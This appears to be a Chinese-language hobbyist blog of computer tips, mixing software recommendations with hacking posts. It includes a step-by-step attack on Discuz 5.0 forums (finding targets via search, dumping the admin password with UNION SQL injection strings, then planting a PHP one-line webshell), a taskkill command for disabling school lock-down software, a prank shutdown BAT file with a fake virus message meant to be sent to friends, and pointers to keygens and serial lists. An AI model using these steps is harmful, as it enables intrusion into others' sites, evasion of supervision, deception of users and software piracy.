自學電腦世界各種新知

經常覺得自己的知識不夠麼，那麼可以使用Google，Wikipedia ( 維基百科 ) 搜尋各種的資訊/資料，充實自己的知識。

Google 是一個非常良好的搜尋器，各種資訊也可以使用它來搜尋出來，支援各種的搜尋語法，可以加快找到所需要的資料。以下附上一本電子書，出版自O'Reilly 的，稱為 　介紹Google 的使用方法。

下載Google- The missing manual

Wikipedia ( 維基百科 ) 是一個網上的百科全書，近乎所有你不明白的東西，也可以在這裏找到答案啊！而且更有各種的語言。

http://www.wikipedia.org/

解除學校電腦鎖機

在學校，老師會因為教學理由，將學生的電腦全部鎖定，使學習更有效率，但是學生是可以突破限制，解除鎖定。

理論：檢查工作管理員，查看是否有student.exe 的程序，學校鎖機系統的程式，常名為student.exe ，只要把它結束後，鎖機的功能將會失效。

方法：

1) 使用工作管理員停止student.exe 程序。
2) 使用CMD (命令提示字元) 停止 student.exe 程序。

命令：
taskkill /f /im student.exe

3) 將以上指令存成bat 檔案執行。

DISCUZ 論壇下載

Discuz! 是一個著名的國內PHP論壇程式，現時最新版本為6.0.0 RC1， 各位可以在以下的網站找到2.0.0 的版本，試試找出漏洞，並利用漏洞，增強各位的安全意識，以及鞏固PHP的認知。


http://download.comsenz.com/Discuz/

希望各位可以好好利用，在自己的電腦架伺服器，可以使用Appserv 。

Discuz 5.0 討論區漏洞

我最近瀏覽網站時，找到一個網誌說Discuz 5.0 的漏洞。

dz5最近出現了爆管理員密碼漏洞,問題出在pm.php,好友群發那裡.代碼如下:
3800hk

利用方法:
工具dz5.htm

1 在google裡輸入關鍵詞:Powered by Discuz! 5.0.0 搜索,找到入侵網站,也可以用網站獵手.
2 打開要入侵的網站,註冊一個用戶,登錄,在底部 清除 Cookies 處點右鍵,屬性,找到hash值,將其複製到利用工具裡hash裡,同時複製網址到工具url裡.
3查看右上角的會員 找到其版主的用戶名和id 把用戶名填到工具的msgto裡,修改 用ID值修改UID=1 中的1,點gogogo即可爆出密碼
3 找到成功利用可以爆出管理員密碼,登錄後台,然後在模版那裡,可以直接修改,選擇任一文件,插入lanke的php一句馬,用lanke 的客戶端連接,提交變量,成功會有環境變量的顯示,利用就成功了!



有時爆出的密碼只有15位,大家不會破解吧,那就按下面的方法就行啦!

15位有辦法解決的
你把SQL語句換一下啊
0) union select length(password),2,0 from cdb_members where uid=1/*
這句是得到MD5長度
0) union select left(password,15),2,0 from cdb_members where uid=1/*
這句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
這句得到MD5 16-30位
0) union select right(password,2),2,0 from cdb_members where uid=1/*
這句得到MD5 31-32位
MD5一共是32位的

安全網站推介

想再網絡、系統安全下多番功夫? 又或是想找找電腦資料安全相關資料，可以試試這個網站:

http://www.packetstormsecurity.org/
PacketStormSecurity

裡面收藏有不少C 程式的原始碼，而且是高級至關於網絡編程，適合專家閱覽，當中著名的木馬程式，如Back Orifice, BO2K 等。

Appserv 2.6.0 最新版

若果各位還有記憶的話，我之前曾經介紹過這個軟件，這個軟件可以架設動態網站伺服器，與上次不同的是，這個版本是最新的版本，內含有的核心軟件都更新了，防止每天也被發現的漏洞。

這個軟件能架起支援PHP , MYSQL 的伺服器，在學習php 的朋友，不妨試試這個，安裝後可以用來實習實習啊。

當中PHP 程式，不少有安全漏洞，如SQL Injection Vulnerability , XSS (Cross Site Scripting) , code Injection ... ...　這些都可以在自行架設的伺服器中嘗試，但當然要自己寫一些含有漏洞的程式吧！

Windows 2000 ~ Windows Vista 系統內核漏洞(MS08-025)

Windows 2000 至 Windows Vista ，包括 Windows Server 2008 ，都存有以下一個本地權限提升(Local Privilege Escalation)的漏洞。若果攻擊者成功利用這個漏洞，可以在受影響系統執行任意命令，如新增帳戶或安裝軟件等。

這個漏洞是由於win32k.sys中，對使用者提供的記憶體指標(pointer)，沒有足夠的驗證。

但此漏洞只適用於一個可觸摸的電腦而進行入侵，進行權限提升，而因為大部份的電腦都未修正這個漏洞，故此在這裏不詳述。

安全漏洞公佈網站

經常在別人口中聽到漏洞一詞，究竟你對它的認識又有多少呢？
你可以在以下這個網站找到一些最近發現的漏洞，一些常用軟件或是作業系統的漏洞都有講。

http://www.securityfocus.com/

這個是英文網站，若果英文還有小小功力的，可以看看。

關於之前有些軟件的連結失效，若有需要，可以連絡我。

MSN : clsdennis2007@hotmail.com

免費病毒防護軟件

AVG、卡巴斯基、NOD32、Avast，大家用得多了，是否有點生厭，或是想有些新體驗。那各位可以試試免費的ClamWin 掃毒軟件，那是由C (好像是C++)寫成的，也開放原始碼。

我在這裏給大家一個隨身攜帶版本，可以安裝在手指裏，帶到其他地方，但它好像沒有實時防護的功能，看書好像要加上WinPooch才做到這個功能。

下載ClamWin　隨身攜帶版本防毒軟件

關於WinPooch，這個軟件其實是檔案和系統的註冊表(Registry)的監控軟件，病毒通常會修改系統的註冊表資訊，以及系統重要檔案，使達到某些目的，一般有隨系統啟動而啟動的功能，在開啟程式時自動感染其他檔案等，但它不可以取代防毒軟件。

Power2Go V6 Deluxe 燒碟軟件

前陣子，裝了Nero 這套燒錄軟件，再查看C:\ 的容量，看到Nero 用了我接迎2 GB的硬碟，看到實在不高興，因為系統纖小就是快嗎? 結果，在四月那次因為電腦怪怪的，所以重裝，就選來這款軟件試試，應該也不錯吧！

這個軟件可以在官方網站下載得到。

http://tw.cyberlink.com/multi/products/main_24_CHT.html

序號在此不提供了，要的可以到Google 找序號機放在Virtual PC 裡用。

序號大全

序號的搜尋有時非常困難，但大型軟件也面對著一個問題，就是找來的網頁是不是安全，按下去可能隨時感染木馬病毒，那麼現在提供您兩個文字檔案，一個是載有不同軟件的序號，第二個是舊版Windows 的序號。

Windows 序號檔案

軟件序號檔案

ThreatFire 惡意程式/病毒監控

病毒經常破壞您的系統，但沒有被防毒偵測出來嗎？只要您安裝了ThreatFire 3.0 這套的免費軟件，它可以即時監察您的系統，當發現可疑動作時，會詢問使用者是否繼續進行，這種稱為主動式防禦的HIPS ( Host-based intrusion detection system ) 能夠填補一般防毒軟件的不足，在防毒軟件公司釋出病毒碼前的「真空期」，在恰當使用下，可以得到一定程度的保障。

ThreatFire 3.0 若個人使用是免費的，不用付任何費用，更新後，可以擁有掃瞄威脅的功能。

Windows XP SP3 更新

Windows XP SP2 這個版本的XP已推出一段時間了，現在微軟公司推出了一個重大的修正集合檔案－Windows XP SP3 。這個更新修正Windows XP 內不少的漏洞，加強了資訊安全。

下載Windows XP SP3 更新檔案

我魔法大師已經在我進行實驗的虛擬電腦裝上了Windows XP SP3 ，緊貼最新的發展，當然還保留了舊版本，以備不時之需吧！

若果還在使用舊版的，可能會被黑客入侵啊！建議各位趕快更新。

uTorrent 1.7.7 小巧BT 軟件

在要求甚麼也小巧的情況，避免系統速度因為硬碟的碎片而減慢，可以試試以下介紹的這款BitTorrent 客戶端(client)軟件，容量只有200 多KB ，非常適合各位，特別是要求纖細的用家。

這個軟件的設定值也頗多的，但設定值可以保持預設值，軟件也可以正常運作。

各位可以在以下的網站下載uTorrent 1.7.7

官方網站：http://www.utorrent.com

自己小把戲玩弄朋友

有沒有想戲弄一下朋友的想頭? 現在有一個機會了，您可以製作一個BAT檔，便可以顯示一個對話方塊，1分鐘(或您自己定的時間) 後把您好朋友的電腦關掉，但是可以使用一個小指令解除，以下教您如何製作這個小玩意。閒時沒有東西可幹，寄給別人嚇他人一驚都不錯的。

1.開啟記事本輸入以下的內容:

shutdown -s -t 60 /c 你的電腦感染了病毒，在關機完成時，病毒便會完成感染程序。









2.按檔案>儲存，在檔案名稱後，加上 .BAT 這個副檔名。

3.在MSN或Yahoo! Messenger 寄信你的朋友。

但是MSN 是限制著不允許寄送BAT 副檔名的檔案。

Windows 作業系統全集

Windows 相信各位用得多，但是有沒有想過試試用舊版的Windows，例如DOS / Windows 3.1，體驗一下從前使用電腦的感覺。

現在有機會給各位親身體驗一下了，下載以下的BT 種子，一齊體驗舊版Windows 吧!

裡面收藏了由DOS 至 Windows Vista 的作業系統... ...

DOS
Windows 3.1
Windows 95
Windows NT 4.0
Windows 98
Windows 2000
Windows XP Professional
Windows Vista Ultimate

但是遺憾的是沒有了Windows ME... 有機會也找它出來，和各位分享

下載